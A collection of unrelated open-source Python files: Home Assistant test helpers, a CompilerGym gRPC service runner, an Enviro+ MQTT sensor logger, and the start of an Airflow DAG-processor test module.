def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = ReceiveMessage(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(
hass: HomeAssistant, datetime_: datetime = None, fire_all: bool = False
) -> None:
"""Fire a time changed event."""
if datetime_ is None:
datetime_ = date_util.utcnow()
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def get_fixture_path(filename: str, integration: str | None = None) -> pathlib.Path:
"""Get path of fixture."""
if integration is None and "/" in filename and not filename.startswith("helpers/"):
integration, filename = filename.split("/", 1)
if integration is None:
return pathlib.Path(__file__).parent.joinpath("fixtures", filename)
else:
return pathlib.Path(__file__).parent.joinpath(
"components", integration, "fixtures", filename
)
def load_fixture(filename, integration=None):
"""Load a fixture."""
return get_fixture_path(filename, integration).read_text()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
if mock_entries is None:
mock_entries = {}
registry.entities = entity_registry.EntityRegistryItems()
for key, entry in mock_entries.items():
registry.entities[key] = entry
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
async_remove_config_entry_device=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
if async_remove_config_entry_device is not None:
self.async_remove_config_entry_device = async_remove_config_entry_device
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
pref_disable_new_entities=None,
pref_disable_polling=None,
unique_id=None,
disabled_by=None,
reason=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid_util.random_uuid_hex(),
"domain": domain,
"data": data or {},
"pref_disable_new_entities": pref_disable_new_entities,
"pref_disable_polling": pref_disable_polling,
"options": options,
"version": version,
"title": title,
"unique_id": unique_id,
"disabled_by": disabled_by,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
if reason is not None:
self.reason = reason
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries[self.entry_id] = self
hass.config_entries._domain_index.setdefault(self.domain, []).append(
self.entry_id
)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries[self.entry_id] = self
manager._domain_index.setdefault(self.domain, []).append(self.entry_id)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(files_dict.keys(), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
"""Initialize the recorder asynchronously."""
config = add_config or {}
if recorder.CONF_DB_URL not in config:
config[recorder.CONF_DB_URL] = "sqlite://"
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert await async_setup_component(
hass, recorder.DOMAIN, {recorder.DOMAIN: config}
)
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state = {
**restored_state,
"attributes": json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
),
}
last_states[state.entity_id] = restore_state.StoredState.from_dict(
{"state": restored_state, "last_seen": now}
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
def mock_restore_cache_with_extra_data(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state, extra_data in states:
restored_state = state.as_dict()
restored_state = {
**restored_state,
"attributes": json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
),
}
last_states[state.entity_id] = restore_state.StoredState.from_dict(
{"state": restored_state, "extra_data": extra_data, "last_seen": now}
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def entity_category(self):
"""Return the entity category."""
return self._handle("entity_category")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
@property
def icon(self):
"""Return the suggested icon."""
return self._handle("icon")
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
raise_contains_mocks(data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module, built_in=True):
"""Mock an integration."""
integration = loader.Integration(
hass,
f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}"
if built_in
else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}",
None,
module.mock_manifest(),
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
def raise_contains_mocks(val):
"""Raise for mocks."""
if isinstance(val, Mock):
raise ValueError
if isinstance(val, dict):
for dict_value in val.values():
raise_contains_mocks(dict_value)
if isinstance(val, list):
for dict_value in val:
raise_contains_mocks(dict_value)
|
create_and_run_compiler_gym_service.py
|
#! /usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""An example CompilerGym service in python."""
import os
import sys
from concurrent import futures
from multiprocessing import cpu_count
from pathlib import Path
from signal import SIGTERM, signal
from tempfile import mkdtemp
from threading import Event, Thread
from typing import Type
import grpc
from absl import app, flags, logging
from compiler_gym.service import connection
from compiler_gym.service.compilation_session import CompilationSession
from compiler_gym.service.proto import compiler_gym_service_pb2_grpc
from compiler_gym.service.runtime.compiler_gym_service import CompilerGymService
from compiler_gym.util import debug_util as dbg
from compiler_gym.util.filesystem import atomic_file_write
from compiler_gym.util.shell_format import plural
flags.DEFINE_string("working_dir", "", "Path to use as service working directory")
flags.DEFINE_integer("port", 0, "The service listening port")
flags.DEFINE_integer(
"rpc_service_threads", cpu_count(), "The number of server worker threads"
)
flags.DEFINE_integer("logbuflevel", 0, "Flag for compatability with C++ service.")
FLAGS = flags.FLAGS
MAX_MESSAGE_SIZE_IN_BYTES = 512 * 1024 * 1024
shutdown_signal = Event()
# NOTE(cummins): This script is executed in a subprocess, so code coverage
# tracking does not work. As such we use "# pragma: no cover" annotation for all
# functions.
def _shutdown_handler(signal_number, stack_frame): # pragma: no cover
del stack_frame # Unused
logging.info("Service received signal: %d", signal_number)
shutdown_signal.set()
def create_and_run_compiler_gym_service(
compilation_session_type: Type[CompilationSession],
): # pragma: no cover
"""Create and run an RPC service for the given compilation session.
This should be called on its own in a self contained script to implement a
compilation service. Example:
.. code-block:: python
from compiler_gym.service import runtime
from my_compiler_service import MyCompilationSession
if __name__ == "__main__":
runtime.create_and_run_compiler_gym_service(MyCompilationSession)
This function never returns.
:param compilation_session_type: A sublass of :class:`CompilationSession
<compiler_gym.service.CompilationSession>` that provides implementations
of the abstract methods.
"""
def main(argv):
# Register a signal handler for SIGTERM that will set the shutdownSignal
# future value.
signal(SIGTERM, _shutdown_handler)
argv = [x for x in argv if x.strip()]
if len(argv) > 1:
print(
f"ERROR: Unrecognized command line argument '{argv[1]}'",
file=sys.stderr,
)
sys.exit(1)
working_dir = Path(FLAGS.working_dir or mkdtemp(prefix="compiler_gym-service-"))
(working_dir / "logs").mkdir(exist_ok=True, parents=True)
FLAGS.log_dir = str(working_dir / "logs")
logging.get_absl_handler().use_absl_log_file()
logging.set_verbosity(dbg.get_logging_level())
# Create the service.
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=FLAGS.rpc_service_threads),
options=connection.GRPC_CHANNEL_OPTIONS,
)
service = CompilerGymService(
working_directory=working_dir,
compilation_session_type=compilation_session_type,
)
compiler_gym_service_pb2_grpc.add_CompilerGymServiceServicer_to_server(
service, server
)
address = f"0.0.0.0:{FLAGS.port}" if FLAGS.port else "0.0.0.0:0"
port = server.add_insecure_port(address)
with atomic_file_write(working_dir / "port.txt", fileobj=True, mode="w") as f:
f.write(str(port))
with atomic_file_write(working_dir / "pid.txt", fileobj=True, mode="w") as f:
f.write(str(os.getpid()))
logging.info(
"Service %s listening on %d, PID = %d", working_dir, port, os.getpid()
)
server.start()
# Block on the RPC service in a separate thread. This enables the
# current thread to handle the shutdown routine.
server_thread = Thread(target=server.wait_for_termination)
server_thread.start()
# Block until the shutdown signal is received.
shutdown_signal.wait()
logging.info("Shutting down the RPC service")
server.stop(60).wait()
server_thread.join()
logging.info("Service closed")
if len(service.sessions):
print(
"ERROR: Killing a service with",
plural(len(service.session), "active session", "active sessions"),
file=sys.stderr,
)
sys.exit(6)
app.run(main)
|
logger.py
|
import collections, threading, traceback
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from pms5003 import PMS5003
from enviroplus import gas
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples):
self.bme280 = BME280()
self.prefix = prefix
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
if use_pms5003:
self.pm_thread = threading.Thread(target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
def temperature_compensation(self, temp_sensor):
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
data = f.readlines()
# temp_cpu is int, we have to div by 1000
temp_cpu = int(data[0].rstrip())
temp_corrected = temp_sensor-(1*((temp_cpu/1000)-temp_sensor)/14.5)-15 # calculated corretion
return temp_corrected
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
If the sensor is not polled continously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"particulate/1.0": pm_data.pm_ug_per_m3(1.0, atmospheric_environment=True),
"particulate/2.5": pm_data.pm_ug_per_m3(2.5, atmospheric_environment=True),
"particulate/10.0": pm_data.pm_ug_per_m3(None, atmospheric_environment=True),
}
except:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def take_readings(self):
gas_data = gas.read_all()
readings = {
"proximity": ltr559.get_proximity(),
"lux": ltr559.get_lux(),
"temperature": self.temperature_compensation(float(self.bme280.get_temperature())),
"pressure": self.bme280.get_pressure(),
"humidity": self.bme280.get_humidity(),
"gas/oxidising": gas_data.oxidising,
"gas/reducing": gas_data.reducing,
"gas/nh3": gas_data.nh3,
}
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value))
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
value_sum = sum([d[topic] for d in self.samples])
value_avg = value_sum / len(self.samples)
self.publish(topic, value_avg)
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
|
test_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import pathlib
import random
import socket
import sys
import threading
import unittest
from datetime import datetime, timedelta
from tempfile import TemporaryDirectory
from textwrap import dedent
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
import pytest
from freezegun import freeze_time
from airflow.configuration import conf
from airflow.dag_processing.manager import (
DagFileProcessorAgent,
DagFileProcessorManager,
DagFileStat,
DagParsingSignal,
DagParsingStat,
)
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.models import DagBag, DagModel, TaskInstance as TI, errors
from airflow.models.dagcode import DagCode
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, TaskCallbackRequest
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import DagRunState, State
from airflow.utils.types import DagRunType
from tests.core.test_logging_config import SETTINGS_FILE_VALID, settings_context
from tests.models import TEST_DAGS_FOLDER
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags
TEST_DAG_FOLDER = pathlib.Path(__file__).parent.parent / 'dags'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
# This fake processor will return the zombies it received in constructor
# as its processing result w/o actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_ids, callbacks):
super().__init__(file_path, pickle_dags, dag_ids, callbacks)
# We need a "real" selectable handle for waitable_handle to work
readable, writable = multiprocessing.Pipe(duplex=False)
writable.send('abc')
writable.close()
self._waitable_handle = readable
self._result = 0, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
@staticmethod
def _create_process(file_path, callback_requests, dag_ids, pickle_dags):
return FakeDagFileProcessorRunner(
file_path,
pickle_dags,
dag_ids,
callback_requests,
)
@property
def waitable_handle(self):
return self._waitable_handle
class TestDagFileProcessorManager:
def setup_method(self):
clear_db_runs()
